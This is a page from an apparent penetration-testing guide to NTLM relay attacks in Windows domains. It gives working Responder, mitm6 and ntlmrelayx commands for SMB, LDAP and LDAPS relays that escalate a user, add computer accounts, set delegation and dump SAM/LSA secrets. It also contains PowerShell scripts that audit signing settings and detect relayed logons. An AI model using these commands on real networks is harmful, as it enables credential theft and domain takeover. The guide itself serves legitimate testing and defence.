
# NTLM Relay Attacks

## Understanding NTLM Relay

#### Core Concept

Instead of cracking the Net-NTLM hashes captured by Responder, we can relay them in real time to gain access to another machine as the victim.

Intercept NTLM authentication attempts (see [Authentication Triggers and Forcing Techniques](/my-penetration-test-guide/active-directory/relay-and-poisoning-attacks/authentication-triggers-and-forcing-techniques.md)) and relay them to target systems without needing to crack password hashes.

**Attack Flow**:

{% code overflow="wrap" %}

```
Victim → Attacker (Relay Server) → Target System
```

{% endcode %}

* Victim initiates NTLM authentication to attacker
* Attacker forwards authentication to legitimate target
* Target grants access based on victim's credentials
* Attacker gains access as the victim

**Requirements**:

* Target systems where SMB signing is disabled, or enabled but not required (by default it is disabled on ordinary workstations and enforced on domain controllers)
* Victim authentication attempts, either occurring naturally or forced by the attacker

| Relay type | Requirements |
|---|---|
| SMB to SMB | A domain user that is a local admin on the machine we are relaying the hash to |
| SMB to LDAP | LDAP server does not require signing (disabled or not enforced) |
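The two rows above map to concrete registry settings on the target. The following PowerShell audit script is an added example, not part of the original guide; it reads those settings on the local host and reports whether it would accept a relayed authentication over SMB (any member machine) or LDAP/LDAPS (domain controllers only). Run it elevated on the host under review.

```powershell
# Added audit script (not from the original guide). Reports whether this host
# is a viable NTLM relay target over SMB or LDAP based on its registry settings.
function Get-RegValue {
    param([string]$Path, [string]$Name)
    try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # value absent: the OS default for that setting applies
}
function Format-Setting([object]$Value, [string]$DefaultNote) {
    if ($null -eq $Value) { "not set ($DefaultNote)" } else { "$Value" }
}

$lanmanServer = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$ntdsParams   = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
$findings     = @()

# SMB server signing. RequireSecuritySignature = 1 is the policy "Microsoft
# network server: Digitally sign communications (always)"; with it set, the
# host rejects a relayed SMB session. Only the Default Domain Controllers
# Policy sets it to 1 out of the box, so member machines are normally 0.
$smbRequired = Get-RegValue $lanmanServer 'RequireSecuritySignature'
$findings += [pscustomobject]@{
    Control   = 'SMB signing required (LanmanServer\RequireSecuritySignature=1)'
    Value     = Format-Setting $smbRequired 'default 0 on members, 1 on DCs'
    Relayable = ($smbRequired -ne 1)
}

# LDAP settings only matter where the NTDS (AD DS) service exists, i.e. on a DC.
if (Get-Service -Name NTDS -ErrorAction SilentlyContinue) {
    # LDAPServerIntegrity: 1 = signing not required (historical default),
    # 2 = require signing. With 2 the DC refuses the relayed LDAP bind.
    $ldapIntegrity = Get-RegValue $ntdsParams 'LDAPServerIntegrity'
    $findings += [pscustomobject]@{
        Control   = 'LDAP signing required (LDAPServerIntegrity=2)'
        Value     = Format-Setting $ldapIntegrity 'OS default applies'
        Relayable = ($ldapIntegrity -ne 2)
    }
    # LdapEnforceChannelBinding: 0 = never, 1 = when supported, 2 = always.
    # Only 2 reliably stops relay to LDAPS, since channel binding ties the NTLM
    # exchange to the victim's own TLS session, which the relay cannot reuse.
    $cbt = Get-RegValue $ntdsParams 'LdapEnforceChannelBinding'
    $findings += [pscustomobject]@{
        Control   = 'LDAPS channel binding enforced (LdapEnforceChannelBinding=2)'
        Value     = Format-Setting $cbt 'OS default applies'
        Relayable = ($cbt -ne 2)
    }
}

$findings | Format-Table -AutoSize
```

A `Relayable = True` row on a DC for either LDAP control means the SMB to LDAP and LDAPS commands later on this page would succeed against it; the fix is the corresponding Group Policy setting rather than a direct registry edit.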

***

## SMB Relay Attacks

#### Classic SMB to SMB Relay

**Why?** Relay SMB authentication between different SMB services for lateral movement.

```bash
# Identify relay targets (systems without SMB signing)
crackmapexec smb <network-range> --gen-relay-list relay_targets.txt

# Basic SMB relay to multiple targets
python3 ntlmrelayx.py -tf relay_targets.txt -smb2support

# Start the responder to relay the hashes
sudo responder -I <interface> -dw
```
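The relay described above leaves a recognisable trace on the target: the relayed session is logged as an ordinary Security event 4624 with logon type 3 (Network) and authentication package NTLM, where `WorkstationName` carries the name the victim's client claimed while `IpAddress` is the relay host. The following PowerShell detection script is an added example, not part of the original guide; it assumes it runs on the target host (or via `Invoke-Command`) with rights to read the Security log, and that reverse DNS for legitimate clients is reasonably accurate.

```powershell
# Added detection example (not from the original guide). Lists NTLM network
# logons whose source IP does not reverse-resolve to the workstation name the
# client claimed, which is what a relayed authentication looks like on the target.
param([int]$Hours = 24)

# XPath: successful type-3 NTLM logons inside the time window. Kerberos logons
# are excluded because a relayed NTLM exchange always yields an NTLM logon.
$windowMs = $Hours * 3600000
$xpath = @"
*[System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= $windowMs]]
  and EventData[Data[@Name='LogonType']='3']
  and EventData[Data[@Name='AuthenticationPackageName']='NTLM']]
"@

$events = Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Flatten the <Data Name="..."> elements of EventData into a hashtable.
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    $ip      = $d['IpAddress']
    $claimed = $d['WorkstationName']
    # Local or unknown sources carry nothing to correlate against.
    if ([string]::IsNullOrEmpty($claimed) -or $ip -in @('-', '127.0.0.1', '::1')) { continue }

    # A direct logon resolves back to the claimed workstation; a relayed one
    # resolves to the relay host, or to nothing (attacker boxes rarely have PTRs).
    try   { $rdns = ([System.Net.Dns]::GetHostEntry($ip).HostName -split '\.')[0] }
    catch { $rdns = $null }
    if ($rdns -and ($rdns -ieq $claimed)) { continue }   # consistent, not suspicious

    $rdnsShown = if ($rdns) { $rdns } else { '(no PTR record)' }
    [pscustomobject]@{
        Time       = $e.TimeCreated
        User       = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
        Claimed    = $claimed
        SourceIP   = $ip
        ReverseDNS = $rdnsShown
    }
}
```

Expect some noise from NAT, multi-homed hosts and stale PTR records; the strong signal is a single source IP appearing with many different claimed workstation names in a short window, which is exactly what a relay server feeding `-tf relay_targets.txt` produces.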

***

## Cross-Protocol Relay Attacks

#### SMB to LDAP Relay

**Why?** Relay SMB authentication to domain controllers for Active Directory privilege escalation.

**LDAP Privilege Escalation**

```bash
# Basic privilege escalation via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <low-priv-user>

# Add computer account via LDAP relay
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer EVILCOMPUTER$ --computer-pass CompPass123!

# Delegate access permissions
python3 ntlmrelayx.py -t ldap://<DC-IP> --delegate-access --escalate-user <username>

# LDAP relay with DCSync attack setup
python3 ntlmrelayx.py -t ldap://<DC-IP> --escalate-user <username> --dump
```

**LDAPS (Secure LDAP) Relay**

```bash
# Relay to LDAPS (encrypted LDAP)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username>

# Skip ntlmrelayx's privilege pre-check before attempting escalation
# (--no-validate-privs does not bypass TLS certificate validation)
python3 ntlmrelayx.py -t ldaps://<DC-IP> --escalate-user <username> --no-validate-privs

# Target specific LDAP operations
python3 ntlmrelayx.py -t ldap://<DC-IP> --add-computer NEWPC$ --delegate-access
```

**Requirements**: Domain controller reachable from the relay host, LDAP signing not required on the DC, victim with domain privileges. Relaying to LDAPS additionally fails if the DC enforces LDAP channel binding.

**Attack Value**: Domain admin rights, DCSync capabilities, computer account creation

***

## Advanced Relay Techniques

#### IPv6 + NTLM Relay Combination

**Purpose**: Combine IPv6 attacks with NTLM relay for enhanced targeting and stealth.

**mitm6 + ntlmrelayx Integration**

```bash
# Terminal 1: IPv6 DHCPv6 attack
sudo mitm6 -d <domain.com> --ignore-nofqdn

# Terminal 2: NTLM relay with IPv6 support
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username> --delegate-access

# Terminal 3: Confirm the relay listener is bound on 445 (-l shows listening sockets only)
sudo netstat -tuln | grep :445
```

**Requirements**: IPv6 enabled in target environment

**Attack Value**: More reliable targeting, DNS manipulation, stealth

#### Multi-Protocol Relay Chains

**Purpose**: Chain multiple relay operations across different protocols for complex attack paths.

```bash
# Multi-target relay with different protocols
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support

# Where mixed_targets.txt contains:
# smb://server1.domain.com
# http://webapp.domain.com
# ldap://dc.domain.com
# mssql://database.domain.com

# Chain with specific operations per protocol. -t and -tf are mutually
# exclusive, so put every target in one file; ntlmrelayx applies each option
# to the targets of the matching protocol (--escalate-user to ldap://,
# --sam/--lsa to smb://)
python3 ntlmrelayx.py -tf mixed_targets.txt -smb2support \
    --escalate-user <user> --sam --lsa
```


